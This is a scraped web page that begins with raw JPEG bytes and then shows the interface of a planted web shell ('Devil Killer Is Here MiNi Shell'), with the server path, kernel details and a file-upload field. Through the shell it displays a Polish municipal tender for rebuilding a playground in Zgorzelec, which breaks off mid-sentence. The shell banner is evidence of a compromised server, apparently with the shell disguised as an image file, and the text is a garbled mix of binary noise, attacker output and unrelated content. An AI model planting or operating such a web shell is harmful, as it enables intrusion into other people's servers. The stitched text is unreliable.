JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220211/0005483001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rewitalizacja podwórek w obszarze Śródmieścia - II etap - przebudowa placu zabaw </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Zgorzelec</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GM Zgorzelec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821546</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Domańskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgorzelec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-900</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zgorzelec.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.um-zgorzelec.dolnyslask.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rewitalizacja podwórek w obszarze Śródmieścia - II etap - przebudowa placu zabaw </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c384da7f-8b24-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00054830</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019397/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Rewitalizacja podwórek w obszarze Śródmieścia - II etap - przebudowa placu zabaw</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zgorzelec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zgorzelec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zgorzelec 2.W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami w zakresie, określonym w Rozdziale XIII ust. 3 SWZ, odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”, z uwzględnieniem zapisów Rozdziału XIV SWZ. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.3.Zamawiający i Wykonawcy mogą również komunikować się za pomocą poczty elektronicznej:1)Wykonawca na adres e-mail Zamawiającego: k.zagrodnik@zgorzelec.eu 2)Zamawiający (za pośrednictwem służbowej poczty e-mail osoby uprawnionej do komunikowania się z Wykonawca: k.zagrodnik@zgorzelec.eu – na adres e-mail wskazany do korespondencji w ofercie Wykonawcy.4.Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:1)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,2)komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,3)zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4)włączona obsługa JavaScript,5)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,6)szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,<br/>7)Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 5.Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:1)akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,2)zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. 6.Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.7.Oferta powinna być przygotowana i złożona wg. Rozdziału XIII SWZ.8.Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>9.Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf10.W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów (rozszerzeń):a).zip b).7Z11.Wśród formatów (rozszerzeń) powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony <br/>osób fizycznych w związku z przetwarzaniem danych osobowych i w <br/>sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE <br/>L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) <br/>informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Miasta <br/>Zgorzelec.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym <br/>można się kontaktować pod adresem e-mail: iodo@zgorzelec.eu<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 <br/>ust. 1 lit. c RODO w celu związanym z przedmiotowym <br/>postępowaniem o udzielenie zamówienia publicznego,<br/>prowadzonym w trybie podstawowym, zgodnie z art. 275 pkt 1 <br/>ustawy Pzp.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub <br/>podmioty, którym udostępniona zostanie dokumentacja <br/>postępowania w oparciu o art. 18 i art. 74 ustawy Pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 <br/>ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia <br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania <br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały <br/>czas trwania umowy.<br/>6) obowiązek podania przez Panią/Pana danych osobowych <br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym <br/>określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą <br/>podejmowane w sposób zautomatyzowany, stosownie do art. 22 <br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych <br/>osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pa ni/Pana <br/>danych osobowych (skorzystanie z prawa do sprostowania nie <br/>może skutkować zmianą wyniku postępowania o udzielenie <br/>zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać <br/>integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora <br/>ograniczenia przetwarzania danych osobowych <br/>z zastrzeżeniem okresu trwania postępowania o udzielenie <br/>zamówienia publicznego lub konkursu oraz przypadków, <br/>o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia <br/>przetwarzania nie ma zastosowania w odniesieniu do <br/>przechowywania, w celu zapewnienia korzystania ze środków <br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej <br/>lub prawnej, lub z uwagi na ważne względy interesu <br/>publicznego Unii Europejskiej lub państwa członkowskiego );<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony <br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie <br/>danych osobowych Pani/Pana dotyczących narusza przepisy <br/>RODO; <br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do <br/>usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa <br/>w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec <br/>przetwarzania danych osobowych, gdyż podstawą prawną <br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 <br/>lit. c RODO; <br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu <br/>nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana <br/>danych osobowych przez administratora. Organem właściwym dla <br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych,<br/>ul. Stawki 2, 00-193 Warszawa;<br/>11) jednocześnie Miasto Zgorzelec przypomina o ciążącym na <br/>Pani/Panu obowiązku informacyjnym wynikającym z art. 14 <br/>RODO względem osób fizycznych, których dane przekazane <br/>zostaną Zamawiającemu w związku z prowadzonym <br/>postępowaniem i które Zamawiający pośrednio pozyska od <br/>wykonawcy biorącego udział w postępowaniu, chyba że ma <br/>zastosowanie co najmniej jedno z wyłączeń, o których mowa w <br/>art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.1.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 132000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje wykonanie dokumentacji <br/>projektowej i na jej podstawie realizację prac budowlano montażowych i towarzyszących w zakresie przebudowy placu zabaw <br/>w obrębie ulic: Okrzei, Daszyńskiego, Kościuszki, Sienkiewicza. <br/>Zadanie realizowane w formule zaprojektuj i wybuduj.<br/>Teren inwestycji objęty jest Miejscowym Planem Zagospodarowa nia <br/>Przestrzennego, przyjętym Uchwałą Nr 310/09 Rady Miasta <br/>Zgorzelec z dnia 7 października 2009 r., w sprawie uchwalenia <br/>miejscowego planu zagospodarowania pr zestrzennego obszaru <br/>Śródmieścia w Zgorzelcu (tereny oznaczone symbolem: C4.MW -U). <br/>Przedmiotowa inwestycja znajduje się w obrębie ulic: Okrzei, <br/>Daszyńskiego, Kościuszki, Sienkiewicza. Gmina Zgorzelec, <br/>jednostka ewidencyjna- Zgorzelec, 022502_1.Obszar, na którym <br/>będą prowadzone roboty wpisany jest do rejestru zabytków decyzją<br/>Nr A/1803/448 z dnia 8 grudnia 1958 r. jako historyczny układ <br/>urbanistyczny, w związku z czym ziemne roboty budowlane muszą <br/>być prowadzone za pozwoleniem Wojewódzkiego Konserwatora <br/>Zabytków oraz pod nadzorem uprawnionego archeologa. <br/>2. Zakres przedmiotu zamówienia dotyczącej opracowania <br/>dokumentacji obejmuje w szczególności:<br/>1) przygotowanie mapy do celów projektowych.<br/>Mapa musi posiadać aktualną klauzulę właściwego ośrodka <br/>geodezyjnego oraz powinna spełniać wymagania określone w <br/>odpowiednich przepisach. Zakres mapy powinien obejmować <br/>lokalizację przedmiotu opracowania wraz z terenem przyległym, <br/>niezbędnym do poprawnego rozwiązania projektowych elementów <br/>infrastruktury. Mapa powinna obejmować inwentaryzację <br/>podziemną i naziemną oraz inwentaryzację drzew;<br/>2) opracowanie projektu zagospodarowania terenu;<br/>3) opracowanie dokumentacji technicznej, która określać będzie w <br/>szczególności parametry oraz strefy bezpieczeństwa wszystkich <br/>zaplanowanych w programie funkcjonalno-użytkowym elementów <br/>placu zabaw oraz zawierać informację dotycząca bezpieczeństwa i <br/>ochrony zdrowia;<br/>4) uzyskanie pozwolenia Dolnośląskiego Wojewódzkiego <br/>Konserwatora Zabytków we Wrocławiu na prowadzenie robót<br/>budowlanych przy zabytku;<br/>5) przygotowanie wniosku i uzyskanie skutecznego zgłoszenia <br/>przyjęcia robót niewymagających pozwolenia na budowę całego <br/>zamierzenia budowlanego;<br/>3. Dokumentacja powinna zostać przekazana w formie i ilościach jak <br/>niżej:<br/>1) Forma papierowa (trwale oprawiony każdy egzemplarz):<br/>a) Mapa do celów projektowych – 1 egzemplarz,<br/>b) Projekt zagospodarowania terenu – 2 egzemplarze,<br/>c) Dokumentacja techniczna – 2 egzemplarze,<br/>d) Decyzja Dolnośląskiego Wojewódzkiego Konserwatora <br/>Zabytków we Wrocławiu na prowadzenie robót budowlanych <br/>przy zabytku – 1 egzemplarz,<br/>e) Zaświadczenie przyjęcia zgłoszenia robót niewymagających <br/>pozwolenia na budowę jeśli dotyczy – 1 egzemplarz,<br/>f) Wszystkie nie wymienione wyżej, a wymagane przez <br/>właściwe urzędy, jednostki opracowania, analizy, <br/>uzgodnienia, opinie i decyzje.<br/>2) Forma elektroniczna – kompletną zarchiwizowaną <br/>dokumentację w wersji elektronicznej należy dostarczyć <br/>Zamawiającemu na nośniku typu Pendrive i płycie CD/DVD. <br/>Elementy dokumentacji powinny być zapisane w <br/>poszczególnych plikach w programach edytowalnych w <br/>formacie doc. i pdf, natomiast rysunki w formacie dwg. Nazwa <br/>pliku powinna odzwierciedlać temat opracowania. <br/>Dokumentacja sporządzona w wersji papierowej i przekazana <br/>elektronicznie musi być tożsama. Wszystkie element y muszą <br/>być zaktualizowane i kompletne.<br/>3) Forma i treść opracowanych wniosków o wydanie decyzji <br/>administracyjnych, pozwoleń, uzgodnień, opinii oraz forma i <br/>treść i liczba egzemplarzy materiałów będących załącznikami <br/>do wniosków o ich wydanie muszą być zgodne z <br/>obowiązującymi wymaganiami podmiotów, w dniu ich złożenia <br/>do właściwych organów oraz uzgodniona z Zamawiającym.<br/>4) W przypadku wystąpienia na etapie projektowania kolizji z <br/>urządzeniami podziemnymi/naziemnymi lub w przypadku <br/>zaistnienia konieczności zaprojektowania dodatkowych <br/>obiektów branży innej niż konstrukcyjno-budowlanej, <br/>Wykonawca w ramach wynagrodzenia zobowiązany jest <br/>zapewnić potencjał kadrowy, tj. projektantów dla <br/>poszczególnych dodatkowych branż.<br/>5) Wykonawca zapewni wykonanie dokumentacji projekto wej z <br/>należytą starannością i w zakresie niezbędnym do osiągnięcia <br/>celu, któremu ona służy, z uwzględnieniem aktualnych <br/>przepisów prawa, obowiązujących norm i zasad wiedzy <br/>technicznej.<br/>4. Zakres przedmiotu zamówienia dotyczący wykonania robót <br/>budowlanych obejmuje w szczególności: demontaż urządzeń <br/>zabawowych oraz przewiezienie ich w miejsce wskazane przez <br/>Zamawiającego, rozbiórkę wraz z utylizacją ogrodzenia z siatki oraz <br/>elementów konstrukcji betonowych, wykonanie warstwy <br/>wzmacniającej z geowłókniny oraz wykonanie palisady wokół <br/>urządzenia Małpi Gaj, zakupu i montażu urządzeń zabawowych, <br/>zakupu i montażu tablicy z regulaminem placu zabaw, zakupu piasku <br/>i wykonania z niego nawierzchni dla strefy bezpiecznej urządzenia <br/>Małpi Gaj, humusowanie terenu wraz z obsianiem trawą , wykonanie <br/>ogrodzenia placu zabaw.<br/>5. Szczegółowy opis oraz zakres przedmiotu zamówienia został <br/>zawarty w programie funkcjonalno-użytkowym, stanowiącej<br/>Załącznik nr 5 do SWZ.<br/>6. Przy opracowaniu dokumentacji należy zaprojektować rozwiązania <br/>uwzględniające dostępność dla osób ze szczególnymi potrzebami w <br/>taki sposób, aby mogły korzystać z usług, obiektów czy przestrzeni <br/>w sposób samodzielny na równi z innymi użytkownikami, spełniaj ąc <br/>niezbędne warunki do korzystania z obiektów użyteczności <br/>publicznej i mieszkaniowego budownictwa wielorodzinnego przez <br/>osoby ze szczególnymi potrzebami, zgodnie z ustawą z dnia 19 lipca <br/>2019 r. o zapewnieniu dostępności osobom ze szczególnymi <br/>potrzebami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71351914-3 - Usługi archeologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się <br/>kierował następującymi kryteriami oceny ofert:<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Okres gwarancji (G) – waga kryterium 40 %.<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C):<br/>Podstawą przyznania punktów w kryterium „cena” będzie cena <br/>ofertowa brutto podana przez Wykonawcę w Formularzu <br/>Ofertowym.<br/>Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie <br/>Wykonawca poniesie w związku z realizacją przedmiotu <br/>zamówienia.<br/>Zamawiający oceni oferty według wzoru:<br/>C = (Cn/Cb) x 60<br/>C – liczba punktów za kryterium „cena”, <br/>Cn – cena najniższa z badanych ofert, spośród wszystkich <br/>złożonych ofert niepodlegających odrzuceniu<br/>Cb – cena badanej oferty<br/>60 – maksymalna liczba punktów, która może być przyznana <br/>w tym kryterium <br/> <br/>2) Okres gwarancji (G):<br/>Podstawą przyznania punktów w kryterium „okres gwarancji” <br/>będzie okres gwarancji w miesiącach, na wykonane roboty <br/>budowlane oraz zastosowane materiały i urządzenia, podany <br/>przez Wykonawcę w Formularzu Ofertowym.<br/>Zgodnie z warunkami niniejszej SWZ minimalny okres gwarancji <br/>na wykonane roboty budowlane oraz zastosowane przy realizacji <br/>zamówienia materiały i urządzenia wynosi 36 miesięcy, <br/>natomiast maksymalny 60 miesięcy. <br/>Zamawiający oceni oferty wg wzoru:<br/>G = (Gm/Gmax) x 40<br/>G – liczba punktów za kryterium „okres gwarancji”<br/>Gm- ilość miesięcy badanej ofert<br/>Gmax – maksymalny okres gwarancji (60 m-cy)<br/>40 – maksymalna liczba punktów, która może być przyznana <br/>w tym kryterium<br/>Zamawiający wymaga, aby Wykonawca określił okres gwarancji <br/>w miesiącach, przy czym do oceny ofert w ramach 